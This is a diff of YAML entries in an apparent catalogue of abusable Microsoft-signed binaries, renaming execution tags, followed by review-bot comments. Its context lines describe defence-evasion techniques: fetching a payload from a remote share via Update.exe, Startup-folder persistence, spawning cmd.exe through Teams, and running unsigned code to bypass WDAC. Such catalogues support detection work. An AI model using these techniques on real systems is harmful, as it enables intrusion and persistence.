--- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 952594d..f6f9eea 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed Tags: - - Execute: EXE + - Execute: CMD - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index eb61349..f54457e 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 57de244..16b369e 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any DLL. Usecase: Execute DLL 
@@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: dotnet.exe fsi Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Usecase: Execute arbitrary F# code @@ -30,7 +30,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 and up with .NET SDK installed Tags: - - Execute: Fsharp + - Execute: FSharp - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL @@ -39,7 +39,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 and up with .NET Core installed Tags: - - Execute: CSProj + - Execute: CSharp Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index c770ad2..6058ea5 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp - Command: fsi.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -21,7 +21,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp Full_Path: - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 2a8f79c..4241cbe 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp - Command: fsianycpu.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -21,7 +21,7 @@ Commands: MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Fsharp + - Execute: FSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index d39ab32..7090e1e 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index aaa583e..e495ef0 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 4483560..b7c66aa 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index 8cfa543..622843c 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Javascript + - Execute: Node.JS - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Usecase: Execute JavaScript code @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Javascript + - Execute: Node.JS - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index c0b51ae..1dde3d0 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -79,7 +79,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - - Execute: Nuget + - Execute: CMD - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. 
@@ -109,7 +109,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - - Execute: EXE + - Execute: CMD - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml index ba2b6ba..1713678 100644 --- a/yml/OtherMSBinaries/VSDiagnostics.yml +++ b/yml/OtherMSBinaries/VSDiagnostics.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe Detection: diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 806df6d..40dd205 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - - Execute: Csharp + - Execute: XOML Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 11d34d9..92970b5 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml 
@@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: wsl.exe --exec bash -c "" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands.
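Review bot: the new value `DLL (.NET)` in the Dotnet.yml hunk at `@@ -21,7 +21,7 @@` breaks the single-token CamelCase convention every other tag in this patch adopts (`FSharp`, `CSharp`, `PowerShell`, `XOML`, `CMD`), and a value containing a space and parentheses is awkward for anyone filtering entries on `Execute:`. Suggest one token (for example `DotNetDLL`, or whatever name is chosen for the vocabulary) and, since this patch renames tags across a dozen files without any visible definition of the accepted values, adding the canonical list to the contribution docs plus a schema or CI check so the variants being removed here (`Fsharp`, `Csharp`, `Powershell`, `Javascript`) are not reintroduced.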
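Review bot: in the Dotnet.yml hunk at `@@ -39,7 +39,7 @@` the tag changes from `CSProj` to `CSharp`, but the command is `dotnet.exe msbuild [Path_TO_XML_CSPROJ]` and the description says it executes unsigned code from an MSBuild project; the input artefact is a project file, not C# source, so `CSharp` drops the file type a detection engineer would watch for and conflates this entry with Rcsi's genuine C# script execution. Consider keeping `CSProj` (or `MSBuild`) here.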
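Review bot: the Fsi.yml hunk at `@@ -21,7 +21,7 @@` is a pure casing fix, but the unchanged context line beneath it still carries a doubled separator in `C:\Program Files\dotnet\sdk\\FSharp\fsi.exe`, which looks like a stripped SDK version placeholder; since the file is being touched anyway, restore the placeholder (or correct the path) in the same change.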
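Review bot: the Sqltoolsps.yml hunk at `@@ -12,7 +12,7 @@` corrects `Powershell` to `PowerShell`, but its `Full_Path` context still points at `...\130\Tools\Binn\sqlps.exe`, the same binary name Sqlps.yml lists, rather than a `sqltoolsps.exe`. Either the path is wrong or the two entries describe the same binary; please verify and fix the path while this file is open.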
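Review bot: in the Teams.yml hunk at `@@ -21,7 +21,7 @@` the second entry receives `Execute: Node.JS`, but its command is `teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ..."` and the description says Teams spawns cmd.exe as a child process; no JavaScript runs there. The rest of this patch uses `Execute: CMD` for exactly that shape (At, Conhost, Update, VSDiagnostics, Wsl), so this entry should be `CMD`, with `Node.JS` reserved for the ASAR entry in the hunk above it.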
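Review bot: the Update.yml hunk at `@@ -79,7 +79,7 @@` replaces `Execute: Nuget` with `Execute: CMD` on the `--updateRollback=\\remoteserver\payloadFolder` entry, but the description says Update.exe fetches a RELEASES file and installs a NuGet package over SMB; that package is the artefact a defender would hunt for, and `CMD` says nothing about it. Keep `Nuget` alongside the retained `Execute: Remote`, or state in the commit message why the format tag is being dropped.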
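Review bot: the Update.yml hunk at `@@ -109,7 +109,7 @@` tags the `--createShortcut=payload.exe -l=Startup` entry as `Execute: CMD`, yet the description says the command only creates a shortcut in the Startup folder so the payload runs at each login; nothing executes when the command itself runs, and the behaviour reads as persistence rather than execution. If the tag vocabulary has no persistence value, that gap is worth raising in this PR rather than labelling the entry `CMD`.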